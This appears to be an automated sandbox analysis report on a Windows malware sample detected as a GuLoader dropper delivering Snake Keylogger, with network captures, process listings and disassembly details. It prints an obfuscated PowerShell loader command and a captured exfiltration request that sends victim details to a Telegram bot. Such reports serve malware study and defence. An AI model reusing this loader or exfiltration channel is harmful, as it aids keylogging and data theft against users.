2024-12-17 12:22:11 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:22:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 426899 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7Sv1euSZqjUMaKBWv5kei4aKDXK%2F2l5d7Nf4jyDh12EhAlSYjswF2uIKsDV946JnjXT8D3HIz87vd2hvwG%2FQxi%2BWw0Uhy6fYSlWO%2FhuJqRqfvaO3pwx67J96PRfabxi4uBL5rIg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36e08e1f49189d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1495&rtt_var=580&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1855146&cwnd=190&unsent_bytes=0&cid=8832fc8cf5f88f75&ts=455&x=0"
2024-12-17 12:22:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49854	149.154.167.220	443	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:22:12 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-17 12:22:13 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 12:22:12 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 12:22:13 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	07:21:01
Start date:	17/12/2024
Path:	C:\Users\user\Desktop\87h216Snb7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\87h216Snb7.exe"
Imagebase:	0x400000
File size:	924'744 bytes
MD5 hash:	C9007399358B2C71F94731C0DADA3AAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:21:04
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)"
Imagebase:	0x720000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.1541477424.0000000008E67000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:21:04
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:58:57
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x610000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	1376
Total number of Limit Nodes:	37

Executed Functions

Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040353F
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
OleInitialize.OLE32(00000000), ref: 0040365A
SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
CharNextW.USER32(00000000,"C:\Users\user\Desktop\87h216Snb7.exe",00000020,"C:\Users\user\Desktop\87h216Snb7.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

wsprintfW.USER32 ref: 0040399B
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user~1\AppData\Local\Temp\), ref: 004039CE
DeleteFileW.KERNEL32(0042C800), ref: 004039DA
SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A08

Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B

CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403A1E

Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
ExitProcess.KERNEL32 ref: 00403A89
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
ExitProcess.KERNEL32 ref: 00403B33

Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 004037E4, 00403906, 00403953, 00403961
NSIS Error, xrefs: 0040367F
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde, xrefs: 00403911
Low, xrefs: 00403832
~nsu%X.tmp, xrefs: 00403992
Error launching installer, xrefs: 004038E7
\Temp, xrefs: 00403816
TMP, xrefs: 0040384C
"C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 00403694, 0040369A, 004036AF, 0040388D
SeShutdownPrivilege, xrefs: 00403AC2
"$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta, xrefs: 00403949
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037F4, 004037F9, 0040380F, 0040381B, 0040382A, 00403837, 00403843, 0040384B, 00403939, 004039BA, 004039E6, 00403A07, 00403A10
UXTHEME, xrefs: 0040360A, 0040360F, 00403615
C:\Users\user\Desktop, xrefs: 0040395C
1033, xrefs: 00403860
TEMP, xrefs: 00403844

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta$"C:\Users\user\Desktop\87h216Snb7.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-4044666877
Opcode ID: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
Opcode Fuzzy Hash: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E

Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405763
GetDlgItem.USER32(?,000003EE), ref: 00405772
GetClientRect.USER32(?,?), ref: 004057AF
GetSystemMetrics.USER32(00000002), ref: 004057B6
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
ShowWindow.USER32(?,00000008), ref: 00405852
GetDlgItem.USER32(?,000003EC), ref: 00405873
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
GetDlgItem.USER32(?,000003F8), ref: 00405781

Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

GetDlgItem.USER32(?,000003EC), ref: 004058C5
CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
CloseHandle.KERNELBASE(00000000), ref: 004058DA
ShowWindow.USER32(00000000), ref: 004058FE
ShowWindow.USER32(?,00000008), ref: 00405903
ShowWindow.USER32(00000008), ref: 0040594D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
CreatePopupMenu.USER32 ref: 00405992
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
GetWindowRect.USER32(?,?), ref: 004059C6
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
OpenClipboard.USER32(00000000), ref: 00405A27
EmptyClipboard.USER32 ref: 00405A2D
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
GlobalLock.KERNEL32(00000000), ref: 00405A43
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
GlobalUnlock.KERNEL32(00000000), ref: 00405A77
SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
CloseClipboard.USER32 ref: 00405A88

Strings

{, xrefs: 0040596B

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405C76
lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CBE
lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CE1
lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CE7
FindFirstFileW.KERNELBASE(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\87h216Snb7.exe"), ref: 00405CF7
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
FindClose.KERNEL32(00000000), ref: 00405DA6

Strings

"C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 00405C56
\*.*, xrefs: 00405CB8
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C5A

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3947366890
Opcode ID: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
Opcode Fuzzy Hash: 0b85f367639a69f5b614f98777155fba44d4349fb39831c7af8fd38ecdabae30
Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE

Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
FindClose.KERNEL32(00000000), ref: 004068B5

Strings

X_B, xrefs: 0040689F

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: X_B
API String ID: 2295610775-941606717
Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C

Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde, xrefs: 0040228E

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde
API String ID: 542301482-4177089788
Opcode ID: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
Opcode Fuzzy Hash: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54

Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
